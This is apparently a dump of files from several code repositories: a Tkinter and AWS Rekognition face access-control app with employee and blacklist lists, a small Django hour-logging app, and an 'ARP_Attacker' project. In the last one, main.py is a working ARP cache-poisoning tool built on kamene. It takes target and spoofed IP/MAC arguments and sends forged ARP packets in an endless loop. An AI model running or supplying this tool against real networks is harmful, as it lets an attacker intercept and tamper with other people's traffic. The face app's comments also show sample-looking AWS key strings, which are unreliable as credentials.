justify=LEFT, selectbackground='white', highlightbackground='white')\n self.lboxEmpl.grid(row=1,columnspan=2, sticky=\"W\")\n self.lboxEmpl.config(font=(\"times\", 20), bg='lightblue',\n fg='darkred', highlightbackground='Black', width=43, height=12)\n self.lboxEmpl.curselection()\n\n # List of people blacklists\n self.showBlackList = 
Label(frame3, text=\" Id List of Blacklists \")\n self.showBlackList.grid(row=0,column=3,columnspan=2, sticky=\"W\",padx=3 )\n self.showBlackList.config(\n font=(\"Calibri\", 20, 'bold'), fg='white', bg='black')\n\n # showBlackNames=Label(frame5,text = \"\",anchor=W, justify=LEFT)\n # showBlackNames.grid(row=1, sticky=\"W\")\n # showBlackNames.config(font=(\"times\", 20),bg='lightblue',fg='darkred')\n self.lboxBlack = tk.Listbox(\n frame3, justify=LEFT, selectbackground='white', highlightbackground='white')\n self.lboxBlack.grid(row=1,column=3,columnspan=2, sticky=\"W\", padx=3)\n self.lboxBlack.config(font=(\"times\", 20),\n bg='lightblue', fg='darkred', width=43, height=12)\n\n\n self.btnLogout = Button(self, text=\"Log out\",bg='darkred', command=self.logout,\n font = ('calibri', 10, 'bold'),\n foreground = 'green',)\n # btnLogout.grid(ipadx=5, ipady=10)\n self.btnLogout.place(x=775, y=12,relwidth=0.1, relheight=0.03)\n self.faceNameInBucket = []\n\n # read the username from tempUser file\n f = open(\"tempUser\", \"r\")\n self.uname = f.readline()\n f.close()\n\n self.setUserName()\n\n #create a label to show photos\n self.theImage = Label(self,image='',bg=\"black\", borderwidth=4, relief=\"groove\")\n self.theImage.place(x=283, y=518, height=130, width=150)\n\n self.theImageB = Label(self, image='',bg='black', borderwidth=4, relief=\"groove\")\n self.theImageB.place(x=719, y=518, height=130, width=150)\n\n # When program starts, after loading GUI, the list of peoplr available will be displayed on user endpoint\n self.list_faces_in_collection()\n\n def setUserName(self):\n f = open(\"tempUser\", \"r\")\n uname = f.readline()\n self.currentUser.config(text='Hi '+uname.capitalize())\n self.btnLogout.config(text='Log out '+uname.capitalize())\n f.close()\n\n\n def logout(self):\n\n self.theImage.config(image='' )\n self.theImageB.config(image='')\n\n # log out of the previous user\n f = open(\"tempUser\", \"w\")\n f.write('')\n\n 
self.controller.show_frame(StartPage)\n\n def getEntry(self):\n firstName = self.e1.get()\n lastName = self.e2.get()\n permission = self.options.get()\n if permission == 'Employee':\n permission = 'a'\n elif permission == 'Blacklist':\n permission = 'b'\n\n fileName = firstName + \"_\" + lastName + \"_\" + permission + \".jpg\"\n\n return fileName\n\n def getImagePath(self, title='Select File'):\n # root.attributes(\"-topmost\", True)\n # root.withdraw()\n file_path = filedialog.askopenfile()\n if file_path:\n return file_path.name\n else:\n return None\n\n def searchFaceInCollection(self, face):\n # client access for rekognition\n client = boto3.client('rekognition',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2')\n\n # encode the image and get a response\n with open(face, 'rb') as source_image:\n source_bytes = source_image.read()\n\n\n # # to use phot from the aws s3 storage, apply this code\n response = client.search_faces_by_image(\n CollectionId=self.uname,\n Image={'Bytes': source_bytes}\n )\n\n # since response is a dictionary, we can loop it\n # print(response)\n\n for key, value in response.items():\n if key == 'FaceMatches': # go to facematch key of the response dictionary\n if value: # check if faceMatch have value as list\n\n if (value[0][\n 'Similarity'] > 80): # similarity of captured image and photo at collection should be greater than 80, just to make sure it is accurate\n print(key)\n print(\"Similarity rate: \", value[0]['Similarity'],\n \"\\nFace ID from collection: \", value[0]['Face']['FaceId'],\n \"\\nImage ID captured photo: \", value[0]['Face']['ImageId'],\n # \"\\nImage Name: \", value[0]['Face']['ExternalImageId'], ###### note: we can put the name of the person and authorization here\n ) # value[0] is dictionary\n\n information = value[0]['Face']['ExternalImageId'].split(\n \".\") # remove .jpg or .png\n\n info = information[0].split(\"_\") # split the names\n\n name = info[0] + \" 
\" + info[1]\n authorization = info[2]\n\n if authorization == 'a':\n print(\"This Face is already registered as \" +\n name + ' as an Employee')\n self.notifyAdmin = \"Face already registered as: \\n\" + \\\n 'Name: ' + name + ' \\nAuthority: Employee'\n return True\n\n elif (authorization == \"b\"):\n print(\"This Face is already registered as \" +\n name + ' as a Blacklist')\n self.notifyAdmin = \"Face already registered as: \\n\" + \\\n 'Full Name: ' + name + ' \\nAuthority: Blacklist'\n return True\n\n else: # if it is empty, then there is no simillary person\n return False\n\n def upload_file(self, file_name, bucket, object_name=None):\n \"\"\"Upload a file to an S3 bucket\n\n :param file_name: File to upload\n :param bucket: Bucket to upload to\n :param object_name: S3 object name. If not specified then file_name is used\n :return: True if file was uploaded, else False\n \"\"\"\n\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = file_name\n\n # Upload the file\n client = boto3.client('s3',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2'\n )\n try:\n response = client.upload_file(file_name, bucket, object_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True\n\n def uploadFile(self,):\n s3 = boto3.client('s3',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2'\n )\n imagePath = self.getImagePath()\n\n # Check if user exist or not\n firstName = self.e1.get()\n lastName = self.e2.get()\n fullName = firstName + \" \" + lastName\n\n # Check if same person exist on the s3 and face detected on the collection of faces\n if fullName not in self.faceNameInBucket:\n if not self.searchFaceInCollection(imagePath):\n if imagePath: # check if selected image is not empty directory\n faceName = self.getEntry() # name the face in the format of firstName_lastName_a.jpg\n\n with open(imagePath, 
\"rb\") as f: # put the path of the captured image\n # s3.upload_fileobj(f, \"mosibucket1\", faceName)\n s3.upload_fileobj(f,'mosiusersbucket-'+self.uname,faceName)\n\n print(\"Uploading Done!\")\n\n # afetr uploading image to bucket, then add it to collection\n self.addPhoto(faceName)\n\n else:\n print(\"No file selected!\")\n else:\n messagebox.showerror('Person Identified',\n self.notifyAdmin)\n # print(searchFaceInCollection.notifyAdmin)\n else:\n print(\"Name Exist In our record, Please Change name\")\n messagebox.showerror(\n \"Invalid Name\", \"Name Exist In our record, Please Change Name\")\n\n self.e1.delete(0, END)\n self.e2.delete(0, END)\n\n\n # adding faces to collection\n def add_faces_to_collection(self, bucket, photo, collection_id):\n client = boto3.client('rekognition',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2'\n )\n\n response = client.index_faces(CollectionId=collection_id,\n Image={'S3Object': {\n 'Bucket': bucket,'Name': photo}},\n ExternalImageId=photo,\n MaxFaces=1,\n QualityFilter=\"AUTO\",\n DetectionAttributes=['ALL'])\n\n print('Results for ' + photo)\n print('Faces indexed:')\n if response['FaceRecords']:\n print(\"Face Successfully added\")\n for faceRecord in response['FaceRecords']:\n print(' Face ID: ' + faceRecord['Face']['FaceId'])\n print(' Location: {}'.format(\n faceRecord['Face']['BoundingBox']))\n # update the list of users avilable at the user end\n self.list_faces_in_collection()\n else:\n messagebox.showerror(\n 'Face not detected, Please provide clear photo!')\n print('Face not detected, Please provide clear photo!')\n for unindexedFace in response['UnindexedFaces']:\n print(' Location: {}'.format(\n unindexedFace['FaceDetail']['BoundingBox']))\n print(' Reasons:')\n for reason in unindexedFace['Reasons']:\n print(' ' + reason)\n return len(response['FaceRecords'])\n\n# add face to collection\n def addPhoto(self, faceName):\n\n 
###?????????????????????????????????????????????????????????????????????????????????????????????????????????\n f = open(\"tempUser\", \"r\")\n uname = f.readline()\n\n bucket = 'mosiusersbucket-'+uname\n collection_id = uname\n photo = faceName\n\n indexed_faces_count = self.add_faces_to_collection(\n bucket, photo, collection_id)\n if indexed_faces_count != 0:\n print(\"Faces indexed count: \" + str(indexed_faces_count))\n else:\n # ????????\n print(\"User already exist, not added to bucket as key for bucket is name\")\n # but still added to collection as the key is different, colllection uses faceid as key so similar face will not be added bu similar name will be added\n\n # if __name__ == \"__main__\":\n # main()\n\n # List photos in the collection\n\n # change the format of the names by removing _\n def fixNameFormat(self, name):\n n = name.split(\"_\")\n res = n[0] + \" \" + n[1]\n return res\n\n # check the authotization\n def checkAuthorization(self, name):\n n = name.split(\".\")\n aut = n[0]\n\n if aut.endswith('a'):\n return True\n else:\n return False\n\n def downloadImageFromS3(self, img, imgName):\n s3 = boto3.resource('s3', aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2')\n\n s3.Bucket('mosiusersbucket-'+self.uname).download_file(img, imgName)\n\n def showEmpImage(self):\n if self.lboxEmpl.curselection():\n index = self.lboxEmpl.curselection()[0]\n\n folderPath = r'images'\n img_size = (200, 200)\n path = folderPath + '/' + 'imgE.jpg'\n\n # face key to to be searched\n f = self.bucketKeysEmp[index]\n\n # download the images\n self.downloadImageFromS3(f, path)\n\n openImg = Image.open(path)\n openImg.thumbnail(img_size, Image.ANTIALIAS)\n img = ImageTk.PhotoImage(openImg)\n self.theImage.config(image=img)\n self.theImage.image = img\n\n # self.theImage.place(x=282, y=476, height=130, width=150)\n else:\n messagebox.showerror('Name Not Selected',\n 'Select person from the list')\n\n\n\n def 
showBlackPhoto(self):\n if self.lboxBlack.curselection():\n index = self.lboxBlack.curselection()[0]\n\n folderPath = r'images'\n\n img_size = (200, 200)\n # path=folderPath+'/'+fileNames[index]\n path = folderPath + '/' + 'imgB.jpg'\n\n # face key to to be searched\n f = self.bucketKeysBlack[index]\n\n # download the images\n self.downloadImageFromS3(f, path)\n\n openImg = Image.open(path)\n openImg.thumbnail(img_size, Image.ANTIALIAS)\n img = ImageTk.PhotoImage(openImg)\n self.theImageB.config(image=img)\n self.theImageB.image = img\n # self.theImageB.place(x=718, y=476, height=130, width=150)\n else:\n messagebox.showerror('Name Not Selected',\n 'Select person from the list')\n\n\n\n def list_faces_in_collection(self):\n\n #read the current user's username\n f = open(\"tempUser\", \"r\")\n self.uname = f.readline()\n f.close()\n\n collection_id = self.uname\n\n maxResults = 2\n faces_count = 0\n blacklist_count = 0\n tokens = True\n\n client = boto3.client('rekognition',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2')\n\n if collection_id:\n\n response = client.list_faces(CollectionId=collection_id,\n MaxResults=maxResults)\n\n print('Faces in collection ' + collection_id)\n\n listOfPeople = ''\n blacklists = ''\n\n # this list will be used in upload function to make sure the same name doesn't exist in the bucket\n self.faceNameInBucket=[]\n # this stores the names/keys in s3 bucket in the format of Musie_Yemane_a.jpg\n self.bucketKeysEmp = []\n self.bucketKeysBlack = []\n\n # initiate a list to collect list of ID printed from 1 to ---\n self.faceID = [] # This is a normal list, we use function.listname name to make the list accessible by others\n # for black listed people to store their faceid to help us to delete them by id\n self.faceID2 = []\n c = 1\n # make the list boxes empty before loading updated data\n self.lboxEmpl.delete(0, END)\n self.lboxBlack.delete(0, END)\n while tokens:\n\n faces = 
response['Faces']\n for face in faces:\n print(face)\n tempName1 = 'empImages/' + str(c) + '.jpg'\n tempName2 = 'blackImages/' + str(c) + '.jpg'\n c = c + 1\n\n # check if the face is employee or blacklisted\n autho = self.checkAuthorization(face['ExternalImageId'])\n # removes the _ and make the correct names\n FullName = self.fixNameFormat(face['ExternalImageId'])\n\n self.faceNameInBucket.append(\n FullName) # This is to check if user with same name already registered in our record at the user creation\n\n if autho:\n self.lboxEmpl.insert(\n tk.END, ' ' + str(faces_count + 1) + '. ' + FullName)\n\n self.bucketKeysEmp.append(face[\n 'ExternalImageId']) # public list that stores the employees names/keys used in s3 bucket. eg Musie_Yemane_a.jpg\n\n listOfPeople = listOfPeople + \"\\n\" + \" \" + \\\n str(faces_count + 1) + \" \" + FullName\n self.faceID.append(face['FaceId'])\n faces_count += 1\n else:\n\n self.lboxBlack.insert(\n tk.END, ' ' + str(blacklist_count + 1) + '. ' + FullName)\n\n self.bucketKeysBlack.append(face[\n 'ExternalImageId']) # public list that stores the blacklisted names/keys used in s3 bucket. eg Musie_Yemane_a.jpg\n\n blacklists = blacklists + \"\\n\" + \" \" + \\\n str(blacklist_count + 1) + \" \" + FullName\n self.faceID2.append(face['FaceId'])\n blacklist_count += 1\n\n if 'NextToken' in response:\n nextToken = response['NextToken']\n response = client.list_faces(CollectionId=collection_id,\n NextToken=nextToken, MaxResults=maxResults)\n else:\n tokens = False\n\n\n # Delete photo from the bucket s3 amazon database, it uses the image name as key eg. 
Musie_Yemane_a.jpg\n def deletePhotoFromBucket(self, photoKey):\n client = boto3.resource('s3',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2'\n )\n\n client.Object('mosiusersbucket-'+self.uname, photoKey).delete()\n\n # delete photo in the collection\n def delete_faces_from_collection(self, collection_id, faces):\n client = boto3.client('rekognition',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2')\n\n response = client.delete_faces(CollectionId=collection_id,\n FaceIds=faces)\n\n print(str(len(response['DeletedFaces'])) + ' faces deleted:')\n for faceId in response['DeletedFaces']:\n print(faceId)\n return len(response['DeletedFaces'])\n\n def deletePhoto(self):\n\n if self.lboxEmpl.curselection():\n # index of selected item in listbox of employees\n index = self.lboxEmpl.curselection()[0]\n # access the faceID from list faces in collection, which contains all the IDs indexed\n faceIdToBeDeleted = self.faceID[index]\n\n # delete face\n\n collection_id = self.uname\n faces = []\n faces.append(faceIdToBeDeleted) # deletes face from collection\n # delete photo from s3 bucket database\n self.deletePhotoFromBucket(self.bucketKeysEmp[index])\n\n faces_count = self.delete_faces_from_collection(\n collection_id, faces)\n\n print(\"deleted faces count: \" + str(faces_count))\n\n\n # remove photo from the screen\n self.theImage.config(image='')\n\n # Update the lis of users sored in the bucket and collection\n self.list_faces_in_collection()\n\n else:\n messagebox.showerror(\n \"Select a person\", \"Please Select Person to Delete\")\n print('Person not selected!!!')\n\n def deleteBlacklist(self):\n\n if self.lboxBlack.curselection():\n # index of selected item in listbox of blacklists\n index = self.lboxBlack.curselection()[0]\n # access the faceID from list faces in collection, which contains all the IDs indexed\n faceIdToBeDeleted = self.faceID2[index]\n\n # 
delete face\n collection_id = self.uname\n faces = []\n faces.append(faceIdToBeDeleted)\n\n # delete photo from bucket\n self.deletePhotoFromBucket(self.bucketKeysBlack[index])\n\n faces_count = self.delete_faces_from_collection(\n collection_id, faces)\n\n print(\"deleted faces count: \" + str(faces_count))\n\n # remove photo from the screen\n self.theImageB.config(image='')\n\n # Update the lis of users sored in the bucket and collection\n self.list_faces_in_collection()\n\n else:\n messagebox.showerror(\n \"Select a person\", \"Please Select Person to Delete\")\n print('Person not selected!!!')\n\n # validate enty to use only integers\n def validateInt(self, inp):\n if inp.isdigit():\n return True\n elif inp == \"\":\n return True\n else:\n return False\n\n # validate enty to use only alphabets\n def validateStr(self, inp):\n if inp.isalpha():\n return True\n elif inp == \"\":\n return True\n else:\n return False\n\n\n# class PageTwo(Frame):\n# \tdef __init__(self, parent, controller):\n# \t\tFrame.__init__(self, parent)\n#\n# \t\tlabel = Label(self, text=\"Page Two\")\n# \t\tlabel.pack(padx=10, pady=10)\n# \t\tstart_page = Button(self, text=\"Start Page\", command=lambda:controller.show_frame(StartPage))\n# \t\tstart_page.pack()\n# \t\tpage_one = Button(self, text=\"Page One\", command=lambda:controller.show_frame(PageOne))\n# \t\tpage_one.pack()\n\nclass MainMenu:\n def __init__(self, master):\n menubar = Menu(master)\n filemenu = Menu(menubar, tearoff=0)\n filemenu.add_command(label=\"Exit\", command=master.quit)\n menubar.add_cascade(label=\"File\", menu=filemenu)\n master.config(menu=menubar)\n\n\napp = App()\napp.mainloop()\n" }, { "alpha_fraction": 0.5122302174568176, "alphanum_fraction": 0.5326139330863953, "avg_line_length": 31.325580596923828, "blob_id": "5c6eeba6def0197d44c7d9b4f0eeeee22769f857", "content_id": "aba481d8617849c2ec4d122dbd3357caff78f819", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 4170, "license_type": "no_license", "max_line_length": 166, "num_lines": 129, "path": "/face_recognition_system.py", "repo_name": "MusieYemane/Access-Control-using-AWS-Face-Rekognition-Service-in-Python", "src_encoding": "UTF-8", "text": "import dlib\nimport cv2\nfrom imutils.video import VideoStream\nimport imutils\nimport time\n\nimport boto3\n\n# with open('credentials.csv','r') as input:\n# next(input)\n# reader=csv.reader(input)\n# for line in reader:\n# access_key_id=line[2]\n# secret_access_key=line[3]\naccess_key_id = '**************' ##Enter your AWS access key id here for ex. 'AKIL4GOQL&QREDSFFUTQT'\nsecret_access_key = '*****************' ##Enter your AWS Secret access key here ex.'QS5W/xw5zdM6bcZwbz2ZYyLLQlmqdEibQIyn4L87'\n\n\ntempUser= open('tempUser', 'r')\ncol_id= tempUser.read()\ndef recognizeFace():\n photo= 'result.jpg'\n\n # client access for rekognition\n client=boto3.client('rekognition',\n aws_access_key_id = access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2')\n\n\n # encode the image and get a response\n with open(photo, 'rb') as source_image:\n source_bytes= source_image.read()\n\n # # to use phot from the aws s3 storage, apply this code\n response= client.search_faces_by_image(\n CollectionId=col_id,\n Image={'Bytes': source_bytes}\n )\n\n # since response is a dictionary, we can loop it\n #print(response)\n return response\n\n \n\n\ndetector = dlib.get_frontal_face_detector()\n\nprint(\"->Starting Face Detection\")\nc = VideoStream(src=0).start() #For webcam, comment it if using Raspberry Pi Camera module\n# c = VideoStream(usePiCamera=True).start() #For Raspberry Pi Camera module, comment it if using webcam\n# time.sleep(2.0)\nwhile True:\n\n frame = c.read()\n # frame = imutils.resize(frame)\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n rects = detector(gray, 0)\n\n name = ''\n auth = ''\n\n if rects:\n cv2.imwrite('result.jpg',frame)\n print(\"face detected\")\n \n response= 
recognizeFace()\n\n for key, value in response.items():\n if key=='FaceMatches': #go to facematch key of the response dictionary\n if value: #check if faceMatch have value as list\n\n if(value[0]['Similarity']>80): # similarity of captured image and photo at collection should be greater than 80, just to make sure it is accurate\n print(key)\n\n information=value[0]['Face']['ExternalImageId'].split(\".\") # remove .jpg or .png\n\n info=information[0].split(\"_\") # split the names\n\n name=info[0]+\" \"+info[1]\n authorization=info[2]\n\n if authorization=='a':\n auth='Employee'\n print(\"Name: \"+ name,\"\\nAuthorization: Employee\")\n\n elif(authorization==\"b\"):\n auth='Blacklist'\n print(\"Name: \", name ,\"\\nAuthorization: Blacklist\")\n\n print(\"Similarity rate: \", value[0]['Similarity'],\n \"\\nFace ID from collection: \", value[0]['Face']['FaceId'],\n \"\\nImage ID captured photo: \", value[0]['Face']['ImageId'],\n # \"\\nImage Name: \", value[0]['Face']['ExternalImageId'], ###### note: we can put the name of the person and authorization here\n ) # value[0] is dictionary\n\n\n\n else: #if it is empty, then there is no simillary person\n name='Unknown Person'\n print(\"Unknown Person\")\n\n for rect in rects:\n x1 = rect.left()\n y1 = rect.top()-30\n x2 = rect.right()\n y2 = rect.bottom()\n frame = cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 255, 0), 2)\n cv2.putText(frame, name, (x1, y1-50), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 0), 2)\n cv2.putText(frame, auth, (x1, y1-30), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 0), 2)\n\n #time.sleep(50.0)\n\n\n cv2.imshow(\"Frame\", frame)\n if rects:\n cv2.waitKey(0)\n\n key = cv2.waitKey(1) & 0xFF\n \n\n if key == ord(\"q\"):\n break\n\ncv2.destroyAllWindows()\nc.stop()\n" } ]
3
VSpectrum/My_Logs
https://github.com/VSpectrum/My_Logs
ffc3adfca5bb22b628cfd958badf1a22179faa78
9df444ea89c8030ec8638057b661c0a7e2aa1812
ad3c845b93724fa37b88a09b0f776e3d5719bca0
refs/heads/master
2021-01-22T06:23:22.907453
2017-06-13T16:26:50
2017-06-13T16:26:50
92,547,716
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6912928819656372, "alphanum_fraction": 0.6939314007759094, "avg_line_length": 31.514286041259766, "blob_id": "07f3c55f43d86a7d5b46d02c090e043a54e2f03d", "content_id": "29c166bc322b46d617290b0a87d4bc64dce81f19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1137, "license_type": "no_license", "max_line_length": 92, "num_lines": 35, "path": "/mylogs/notes/views.py", "repo_name": "VSpectrum/My_Logs", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, HttpResponse\nfrom notes.models import Log\nfrom collections import OrderedDict\nfrom pprint import pprint\n# Create your views here.\ndef index(request):\n\tLogs = [x for x in Log.objects.all().order_by('order')]\n\tdict_dates = {}\n\n\tfor log in Logs:\n\t\ttry:\n\t\t\tif dict_dates[log.date]:\n\t\t\t\tdict_dates[log.date].append((log.logHours, log.logNote))\n\t\texcept:\n\t\t\tdict_dates[log.date] = [(log.logHours, log.logNote)]\n\tpprint(dict_dates)\n\tdata = {'Logs': OrderedDict(sorted(dict_dates.items(), key=lambda t: t[0], reverse=True)) }\n\treturn render(request,'logs.html', data)\n\ndef filter(request, filter_word):\n\tLogs = [x for x in Log.objects.filter(tags__name__in=[filter_word]).order_by('order')]\n\tdict_dates = {}\n\n\tfor log in Logs:\n\t\ttry:\n\t\t\tif dict_dates[log.date]:\n\t\t\t\tdict_dates[log.date].append((log.logHours, log.logNote))\n\t\texcept:\n\t\t\tdict_dates[log.date] = [(log.logHours, log.logNote)]\n\tpprint(dict_dates)\n\tdata = {'Logs': OrderedDict(sorted(dict_dates.items(), key=lambda t: t[0], reverse=True)) }\n\treturn render(request,'logs.html', data)" }, { "alpha_fraction": 0.6943620443344116, "alphanum_fraction": 0.7002967596054077, "avg_line_length": 29.68181800842285, "blob_id": "5974f520af3546ad0989868513328f4c215ed924", "content_id": "1d9b2bc0df2b9cbcb96f7976517e1dc964395d6f", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 674, "license_type": "no_license", "max_line_length": 77, "num_lines": 22, "path": "/mylogs/notes/models.py", "repo_name": "VSpectrum/My_Logs", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.utils import timezone as datetime\nfrom taggit.managers import TaggableManager\n# Create your models here.\n\nclass Log(models.Model):\n logID = models.AutoField(primary_key=True)\n order = models.SmallIntegerField()\n logHours = models.DecimalField(default=0, max_digits=4, decimal_places=2)\n logNote = models.TextField(blank=False)\n date = models.DateField(default=datetime.now, blank=False)\n tags = TaggableManager()\n\n class Meta:\n verbose_name = 'Log'\n verbose_name_plural = 'Logs'\n\n def __str__(self):\n return str(self.logID)" }, { "alpha_fraction": 0.6792452931404114, "alphanum_fraction": 0.6816037893295288, "avg_line_length": 27.33333396911621, "blob_id": "0ffac56bcad2e24caca6937b282f7b1ad0456549", "content_id": "a9a714f116f2f9f71f248ea53908575fbf56bcf1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 424, "license_type": "no_license", "max_line_length": 59, "num_lines": 15, "path": "/mylogs/notes/admin.py", "repo_name": "VSpectrum/My_Logs", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.contrib import admin\n\n# Register your models here.\nfrom notes.models import Log\n\nclass LogDisplay(admin.ModelAdmin):\n def time_seconds(self, obj):\n return obj.date.strftime(\"%d-%b-%Y | %H:%M:%S\")\n time_seconds.short_description = 'Date'\n list_display = ('logHours', 'logNote', 'order', 'date')\n\nadmin.site.register(Log, LogDisplay)" }, { "alpha_fraction": 0.5888324975967407, "alphanum_fraction": 0.5989847779273987, "avg_line_length": 23.75, "blob_id": 
"0a0b468319cbce9b93b9c802e430f3a33a62b955", "content_id": "318384d99b2a62d6aa7e138b04dbd659b6e90c12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 197, "license_type": "no_license", "max_line_length": 81, "num_lines": 8, "path": "/mylogs/notes/urls.py", "repo_name": "VSpectrum/My_Logs", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^(?P<filter_word>([A-Za-z0-9_\\.-]+))/$$', views.filter, name='filter'),\n]" }, { "alpha_fraction": 0.5431985259056091, "alphanum_fraction": 0.5808823704719543, "avg_line_length": 31.969696044921875, "blob_id": "698dd97bc9cfe4c067484114c0156262d4ef619e", "content_id": "ad7931aec9536a6c2d96f6bf86029df8bb6c99f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1088, "license_type": "no_license", "max_line_length": 170, "num_lines": 33, "path": "/mylogs/notes/migrations/0001_initial.py", "repo_name": "VSpectrum/My_Logs", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.1 on 2017-05-26 16:33\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.utils.timezone\nimport taggit.managers\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('taggit', '0002_auto_20150616_2121'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Log',\n fields=[\n ('logID', models.AutoField(primary_key=True, serialize=False)),\n ('logHours', models.DecimalField(decimal_places=2, default=0, max_digits=4)),\n ('logNote', models.CharField(max_length=10000)),\n ('date', models.DateTimeField(default=django.utils.timezone.now)),\n ('tags', taggit.managers.TaggableManager(help_text='A comma-separated list of tags.', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='Tags')),\n ],\n options={\n 'verbose_name': 
'Log',\n 'verbose_name_plural': 'Logs',\n },\n ),\n ]\n" } ]
5
lightningwm/ARP_Attacker
https://github.com/lightningwm/ARP_Attacker
381662d814a6f6930c1941f92d9d2cab44bf0845
2bde59ed23e5d9d2a92ec0aebeebcd4f557d1861
ce17230f6156ce1ae37ced0b664e243d3e6ff087
refs/heads/master
2020-04-27T21:06:00.401612
2019-03-09T11:12:33
2019-03-09T11:12:33
174,683,158
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7284768223762512, "alphanum_fraction": 0.7450330853462219, "avg_line_length": 29.200000762939453, "blob_id": "e700f10654da6ddfb8df114977640ce648b9525c", "content_id": "737e612c9dfbb8d3a61f8e2a8f47d64c2f4c6dab", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 328, "license_type": "permissive", "max_line_length": 137, "num_lines": 10, "path": "/README.md", "repo_name": "lightningwm/ARP_Attacker", "src_encoding": "UTF-8", "text": "# ARP_Attacker\nPython 3.5 kamene 0.32\n\nHow to use? pip install -r requirement.txt\n\nusage: main.py [-h] -t TARGETIP -tm TARGETMAC -g SRCIP -gm SRCMAC\n\nARP_Attacker\n\noptional arguments: -h, --help show this help message and exit -t TARGETIP 靶机IP -tm TARGETMAC 靶机MAC -g SRCIP 被毒化的IP -gm SRCMAC 被毒化IP对应MAC\n" }, { "alpha_fraction": 0.5797565579414368, "alphanum_fraction": 0.5848814845085144, "avg_line_length": 27.381818771362305, "blob_id": "bbaa22b243b1fe7b6ad17e6d788c383e1d1a207b", "content_id": "3ec69e57bc8e0f1c4d10ef9d4f11dc0b69a17256", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1791, "license_type": "permissive", "max_line_length": 89, "num_lines": 55, "path": "/main.py", "repo_name": "lightningwm/ARP_Attacker", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport argparse\nfrom kamene.all import *\nfrom kamene.config import conf\n\nconf.ipv6_enabled = False\n\n\ndef attack(trgIP, trgMAC, srcIP, srcMAC):\n print('靶机IP %s' % trgIP)\n print('靶机MAC %s' % trgMAC)\n print('待修改的IP %s' % srcIP)\n print('待修改的IP对应MAC %s' % srcMAC)\n eth = Ether()\n arp = ARP(\n # 代表ARP请求或者响应\n op=\"who-has\",\n # 发送方Mac地址/毒化记录中的MAC\n hwsrc=str(srcMAC),\n # 发送方IP地址/毒化记录中的IP\n psrc=str(srcIP),\n # 目标Mac地址/被欺骗主机MAC\n hwdst=str(trgMAC),\n # 目标IP地址/被欺骗主机IP地址\n pdst=str(trgIP)\n )\n # print((eth / arp).show())\n print('ARP数据包信息')\n print(arp.show())\n 
sendp(eth / arp, inter=RandNum(10, 40), loop=1)\n\n\ndef usage():\n print(\n '''用法: ping [-h] [-a pdst hwdst psrc hwsrc]\n 选项:\n -h 使用帮助\n -a <pdst> <hwdst> <psrc> <hwsrc>\n ARP毒化 dpst:靶机IP hwdst:靶机MAC地址 psrc:被毒化的IP hwsrc:被毒化IP对应的MAC地址。\n '''\n )\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='ARP_Attacker')\n parser.add_argument('-t', dest='targetIP', type=str, help='靶机IP', required=True)\n parser.add_argument('-tm', dest='targetMAC', type=str, help='靶机MAC', required=True)\n parser.add_argument('-g', dest='srcIP', type=str, help='被毒化的IP', required=True)\n parser.add_argument('-gm', dest='srcMAC', type=str, help='被毒化IP对应MAC', required=True)\n\n args = parser.parse_args()\n attack(args.targetIP, args.targetMAC, args.srcIP, args.srcMAC)\n sys.exit()\n" }, { "alpha_fraction": 0.4615384638309479, "alphanum_fraction": 0.692307710647583, "avg_line_length": 12, "blob_id": "d24e6ac3dd84b632f2b7a7f296576a93be63f20d", "content_id": "89ca9960bf007fe124dc93dbd22704ec123dd003", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 13, "license_type": "permissive", "max_line_length": 12, "num_lines": 1, "path": "/requirement.txt", "repo_name": "lightningwm/ARP_Attacker", "src_encoding": 